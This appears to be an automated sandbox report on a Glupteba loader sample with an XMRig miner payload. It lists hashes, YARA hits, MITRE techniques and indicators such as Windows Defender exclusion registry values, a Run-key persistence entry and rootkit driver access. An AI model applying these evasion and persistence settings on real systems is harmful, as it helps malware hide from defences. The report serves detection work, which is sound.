glupteba | f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b

Analysis

max time kernel
299s
max time network
303s
platform
windows10-1703_x64
resource
win10-20240221-en
resource tags

arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
submitted
06/03/2024, 05:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Size

4.1MB
MD5

49fcef0438d1ddbc6f53f2103c7b4a33
SHA1

f425055c22acf139dfd4c68a77f6eabf709eeaca
SHA256

f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b
SHA512

d99cc195c8378d5c493630f18c425fe4cc1983bedbd458e86e8e8200641c9e6673f2cfc1a880ed1373d54c7222d38e069f050e590ae06c826a8f4f8918ad4a8c
SSDEEP

98304:hK4sikCKwOcAgetL/sGWSUIwWMfGs/QNIJvvOO0g5iA92HBd:zsiRlTOFUIwWMfGJN8vOtg0A+

Score

10^/10

glupteba xmrig discovery dropper evasion loader miner persistence rootkit trojan upx

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 37 IoCs

resource	yara_rule
behavioral2/memory/4952-2-0x0000000004360000-0x0000000004C4B000-memory.dmp	family_glupteba
behavioral2/memory/4952-3-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/4952-302-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/4952-303-0x0000000004360000-0x0000000004C4B000-memory.dmp	family_glupteba
behavioral2/memory/796-306-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/796-801-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/796-1043-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1047-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1787-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1788-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1797-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1799-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1801-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1803-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1805-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1807-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1809-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1811-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1813-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1815-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1817-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1819-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1821-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1823-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1825-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1827-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-1829-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-2088-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-2139-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/4964-2143-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-2369-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-2589-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/4964-2596-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/4964-2598-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-2607-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-2782-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba
behavioral2/memory/3484-2787-0x0000000000400000-0x00000000022EC000-memory.dmp	family_glupteba

Windows security bypass 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe = "0"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe

XMRig Miner payload 4 IoCs

miner

resource	yara_rule
behavioral2/files/0x000700000001ac08-2081.dat	family_xmrig
behavioral2/files/0x000700000001ac08-2081.dat	xmrig
behavioral2/files/0x000700000001ac08-2083.dat	family_xmrig
behavioral2/files/0x000700000001ac08-2083.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1004	netsh.exe

Executes dropped EXE 9 IoCs

pid	Process
3484	csrss.exe
3684	injector.exe
1788	windefender.exe
392	windefender.exe
2060	dcb505dc2b9d8aac05f4ca0727f5eadb.exe
3968	wup.exe
4964	csrss.exe
4108	713674d5e968cbe2102394be0b2bae6f.exe
4216	1bf850b4d9587c1017a75a47680584c4.exe

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000700000001ac04-1791.dat	upx
behavioral2/memory/1788-1796-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/392-1798-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/392-1802-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/files/0x000800000001ac05-2076.dat	upx
behavioral2/memory/2060-2084-0x0000000000400000-0x00000000008E1000-memory.dmp	upx
behavioral2/files/0x000800000001ac0a-2602.dat	upx
behavioral2/files/0x000700000001ac0b-2777.dat	upx
behavioral2/memory/4108-2780-0x0000000000070000-0x000000000093D000-memory.dmp	upx
behavioral2/memory/4216-2785-0x0000000000400000-0x00000000008E8000-memory.dmp	upx
behavioral2/memory/4108-2788-0x0000000000070000-0x000000000093D000-memory.dmp	upx
behavioral2/memory/4216-2790-0x0000000000400000-0x00000000008E8000-memory.dmp	upx

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe = "0"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Manipulates WinMon driver. 1 IoCs

Roottkits write to WinMon to hide PIDs from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMon	csrss.exe

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 13 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
File created	C:\Windows\rss\csrss.exe	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4636	sc.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2940	schtasks.exe
4756	schtasks.exe

GoLang User-Agent 3 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	48	Go-http-client/1.1
HTTP User-Agent header	52	Go-http-client/1.1
HTTP User-Agent header	53	Go-http-client/1.1

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-12 = "Azores Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2572 = "Turks and Caicos Standard Time"	windefender.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-441 = "Arabian Daylight Time"	windefender.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-362 = "GTB Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time"	windefender.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1048	powershell.exe
1048	powershell.exe
1048	powershell.exe
4952	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
4952	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
3552	powershell.exe
3552	powershell.exe
3552	powershell.exe
796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
796	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
4132	powershell.exe
4132	powershell.exe
4132	powershell.exe
4724	powershell.exe
4724	powershell.exe
4724	powershell.exe
1296	powershell.exe
1296	powershell.exe
1296	powershell.exe
3972	powershell.exe
3972	powershell.exe
3972	powershell.exe
1872	powershell.exe
1872	powershell.exe
1872	powershell.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3484	csrss.exe
3484	csrss.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3484	csrss.exe
3484	csrss.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3684	injector.exe
3484	csrss.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeDebugPrivilege	1048	powershell.exe
Token: SeDebugPrivilege	4952	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Token: SeImpersonatePrivilege	4952	f7b559aba81a1e570a4b589ceffbd83cb9914d38a8e943a4c0c7ae21f30ee60b.exe
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeDebugPrivilege	4132	powershell.exe
Token: SeDebugPrivilege	4724	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	3972	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeSystemEnvironmentPrivilege	3484	csrss.exe
Token: SeSecurityPrivilege	4636	sc.exe
Token: SeSecurityPrivilege	4636	sc.exe
Token: SeDebugPrivilege	216	powershell.exe
Token: SeLockMemoryPrivilege	3968	wup.exe
Token: SeDebugPrivilege	1484	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	1480	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3968	wup.exe

Suspicious use of WriteProcessMemory 62 IoCs

